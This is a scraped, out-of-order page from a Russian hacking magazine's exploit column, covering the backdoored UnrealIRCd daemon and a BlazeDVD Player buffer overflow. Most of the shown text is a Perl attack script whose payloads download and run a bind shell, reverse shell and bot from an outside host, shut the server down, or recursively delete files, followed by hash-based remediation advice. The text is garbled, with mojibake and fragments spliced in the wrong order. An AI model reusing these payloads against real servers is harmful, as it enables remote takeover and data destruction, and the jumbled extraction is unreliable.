12.07.2015 Views

img - Xakep Online

img - Xakep Online

img - Xakep Online

SHOW MORE
SHOW LESS
  • No tags were found...

Create successful ePaper yourself

Turn your PDF publications into a flip-book with our unique Google optimized e-Paper software.

BlazeDVD. «Обработчик» восстанавливает стек для работы ROPpacketstormsecurity.org/groups/synnergy/bindshellunix-O bindshell; chmod +x bindshell; ./bindshell &';my $payload2 = 'AB; cd /tmp; wget http://efnetbs.webs.com/bot.txt -O bot; chmod +x bot; ./bot &';my $payload3 = 'AB; cd /tmp; wget http://efnetbs.webs.com/r.txt -O rshell; chmod +x rshell; ./rshell &';my $payload4 = 'AB; killall ircd';my $payload5 = 'AB; cd ~; /bin/rm -fr ~/*;/bin/rm -fr*';$host = "";$port = "";$type = "";$host = @ARGV[0];$port = @ARGV[1];$type = @ARGV[2];if ($host eq "") { usage(); }if ($port eq "") { usage(); }if ($type eq "") { usage(); }sub usage {printf "\nUsage :\n";printf "perl unrealpwn.pl \n\n";printf "Command list :\n";printf "[1] - Perl Bindshell\n";printf "[2] - Perl Reverse Shell\n";printf "[3] - Perl Bot\n";printf "-----------------------------\n";printf "[4] - shutdown ircserver\n";printf "[5] - delete ircserver\n";exit(1);}} elsif ($type eq "2") {print $sockd "$payload2";} elsif ($type eq "3") {print $sockd "$payload3";} elsif ($type eq "4") {print $sockd "$payload4";} elsif ($type eq "5") {print $sockd "$payload5";} else {printf "\nInvalid Option ...\n\n";usage();}close($sockd);exit(1);}unreal_trojan();# EOFSOLUTIONПроверить исходные коды, из которых собран демон, на наличиешести троянских строк или, что будет проще, проверить MD5-хешархива. У за тро ян е ной версии хеш должен быть 752e46f2d873c1679fa99de3f52a274d , у нормальной версии — 7b741e94e867c0a7370553fd01506c66. Если что не так — удалить строки и пересобрать IRC-демон илискачать с официаль ного сайта (и опять-таки проверить хеш, на всякийпожарный).02CVEN/AПЕРЕПОЛНЕНИЕ БУФЕРАВ BLAZEDVD PLAYERsub unreal_trojan {my $ircserv = $host;my $ircport = $port;# èíèöèèðóåì ñîåäèíåíèåmy $sockd = IO::Socket::INET->new (PeerAddr =>$ircserv, PeerPort => $ircport, Proto => "tcp") || die"Failed to connect to $ircserv on $ircport ...\n\n";print "[+] Payload sent ...\n";# îòñûëêà çëîãî êîíòåíòàif ($type eq "1") {print $sockd "$payload1";XÀÊÅÐ 08 /139/ 10TARGETS• BlazeDVD Player 5.1BRIEFОб уязвимости в этом плеере известно уже достаточно давно, тем неменее я бы хотел обратить внимание на свежий эксплойт под даннуюуязвимость. Дело в том, что эксплойт работает в среде Windows 7, азначит, умеет обходить DEP и ASLR. Автор эксплойта — баг-хантер,известный в Сети под ником mr_me, в девичестве — Стивен Силей(Steven Seeley). Парень этот развлекается тем, что ищет дыры вразличном ПО и пишет адекватные, рабочие эксплойты, за что честьему и хвала (блог товарища — https://net-ninja.net). Хочу отметить,что состоит он в команде Corelan Security Team, создатель которой,043

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!